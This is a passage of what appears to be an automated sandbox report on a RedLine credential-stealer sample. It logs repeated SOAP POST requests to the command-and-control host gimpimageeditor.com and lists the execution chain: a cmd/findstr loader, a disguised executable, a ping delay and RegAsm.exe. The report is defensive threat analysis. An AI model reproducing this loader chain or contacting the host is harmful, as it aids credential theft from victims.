                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:59.698050022 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:59.748395920 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:59.853921890 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:59.904511929 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:54:00.009922981 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:54:00.060822964 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:54:00.175395966 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:54:00.217168093 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:54:00.329998970 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:54:00.373373032 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:54:00.485892057 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:54:00.529540062 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:54:00.642875910 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:54:00.685894012 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:54:00.797838926 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:54:00.841941118 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:54:00.953946114 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:54:00.998198986 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:54:01.110124111 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:54:01.154623985 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:54:01.266222954 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:54:01.310823917 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:54:01.422068119 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:54:01.467139006 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:54:01.583077908 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:54:01.640422106 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:54:01.745847940 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:54:01.799237967 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:54:01.905710936 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:54:01.951348066 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:54:02.078547001 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:54:02.107538939 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:54:02.233943939 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:54:02.263837099 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:54:02.389806986 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:54:02.420466900 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:54:02.545931101 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:54:02.576296091 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:54:02.702394009 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:54:02.732749939 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:54:02.857983112 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:54:02.904568911 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:54:03.042483091 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:54:03.076227903 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:54:03.198723078 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:54:03.245291948 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:54:03.354504108 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:54:03.388744116 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:54:03.510231018 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:54:03.569631100 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:54:03.675441980 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:54:03.701206923 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:54:03.833153009 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:54:03.857547998 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:54:03.988148928 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:54:04.013950109 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:54:04.142520905 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:54:04.170206070 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:54:04.298993111 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:54:04.326333046 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:54:04.454514980 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:54:04.486108065 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:54:04.610255003 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0


                                                                                                                        Statistics

                                                                                                                        CPU Usage

                                                                                                                        Click to jump to process

                                                                                                                        Memory Usage

                                                                                                                        Click to jump to process

                                                                                                                        High Level Behavior Distribution

                                                                                                                        Click to dive into process behavior distribution

                                                                                                                        Behavior

                                                                                                                        Click to jump to process

                                                                                                                        System Behavior

                                                                                                                        General

                                                                                                                        Target ID:0
                                                                                                                        Start time:00:51:59
                                                                                                                        Start date:17/01/2025
                                                                                                                        Path:C:\Users\user\Desktop\2YLM6BQ9S3.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:"C:\Users\user\Desktop\2YLM6BQ9S3.exe"
                                                                                                                        Imagebase:0x400000
                                                                                                                        File size:1'721'467 bytes
                                                                                                                        MD5 hash:7C86D24BF10F9A6970B3C7C86E455423
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:low
                                                                                                                        Has exited:true

                                                                                                                        General

                                                                                                                        Target ID:2
                                                                                                                        Start time:00:51:59
                                                                                                                        Start date:17/01/2025
                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:"C:\Windows\System32\cmd.exe" /c cmd < Ideale.adt
                                                                                                                        Imagebase:0x790000
                                                                                                                        File size:236'544 bytes
                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high
                                                                                                                        Has exited:true

                                                                                                                        General

                                                                                                                        Target ID:3
                                                                                                                        Start time:00:51:59
                                                                                                                        Start date:17/01/2025
                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                        File size:862'208 bytes
                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high
                                                                                                                        Has exited:true

                                                                                                                        General

                                                                                                                        Target ID:4
                                                                                                                        Start time:00:51:59
                                                                                                                        Start date:17/01/2025
                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:cmd
                                                                                                                        Imagebase:0x790000
                                                                                                                        File size:236'544 bytes
                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high
                                                                                                                        Has exited:true

                                                                                                                        General

                                                                                                                        Target ID:5
                                                                                                                        Start time:00:51:59
                                                                                                                        Start date:17/01/2025
                                                                                                                        Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:findstr /V /R "^DzqZaKuCSEcQYFcSDUTCtNHXVpartBbUtTqjUWbpOSHHtRSBbGNtGZbQLrtosenduBMyFpYHvKOjuZSrsQGbOagtclAQSgSLxsADyMWgIuHVkkJLlqRAcq$" San.adt
                                                                                                                        Imagebase:0x400000
                                                                                                                        File size:29'696 bytes
                                                                                                                        MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high
                                                                                                                        Has exited:true

                                                                                                                        General

                                                                                                                        Target ID:6
                                                                                                                        Start time:00:52:00
                                                                                                                        Start date:17/01/2025
                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:Appartenga.exe.com S
                                                                                                                        Imagebase:0xbd0000
                                                                                                                        File size:893'608 bytes
                                                                                                                        MD5 hash:C56B5F0201A3B3DE53E561FE76912BFD
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Antivirus matches:
                                                                                                                        • Detection: 3%, ReversingLabs
                                                                                                                        Reputation:high
                                                                                                                        Has exited:true

                                                                                                                        General

                                                                                                                        Target ID:7
                                                                                                                        Start time:00:52:00
                                                                                                                        Start date:17/01/2025
                                                                                                                        Path:C:\Windows\SysWOW64\PING.EXE
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:ping 127.0.0.1 -n 30
                                                                                                                        Imagebase:0x5c0000
                                                                                                                        File size:18'944 bytes
                                                                                                                        MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high
                                                                                                                        Has exited:true

                                                                                                                        General

                                                                                                                        Target ID:8
                                                                                                                        Start time:00:52:00
                                                                                                                        Start date:17/01/2025
                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com S
                                                                                                                        Imagebase:0xbd0000
                                                                                                                        File size:893'608 bytes
                                                                                                                        MD5 hash:C56B5F0201A3B3DE53E561FE76912BFD
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000003.2416702324.0000000004270000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000008.00000003.2416702324.0000000004270000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000008.00000003.2416702324.0000000004270000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000003.2416510375.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000008.00000003.2416510375.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000008.00000003.2416510375.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000003.2416510375.00000000042D6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000008.00000003.2416510375.00000000042D6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000008.00000003.2416510375.00000000042D6000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000003.2416670855.000000000424C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000008.00000003.2416670855.000000000424C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000008.00000003.2416670855.000000000424C000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000003.2416510375.0000000004286000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000008.00000003.2416510375.0000000004286000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000008.00000003.2416510375.0000000004286000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                        Reputation:high
                                                                                                                        Has exited:true

                                                                                                                        General

                                                                                                                        Target ID:10
                                                                                                                        Start time:00:52:33
                                                                                                                        Start date:17/01/2025
                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
                                                                                                                        Imagebase:0x340000
                                                                                                                        File size:65'440 bytes
                                                                                                                        MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.3266529061.0000000000722000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000A.00000002.3266529061.0000000000722000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 0000000A.00000002.3266529061.0000000000722000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                        Antivirus matches:
                                                                                                                        • Detection: 0%, ReversingLabs
                                                                                                                        Reputation:high
                                                                                                                        Has exited:false

                                                                                                                        Disassembly

                                                                                                                        Reset < >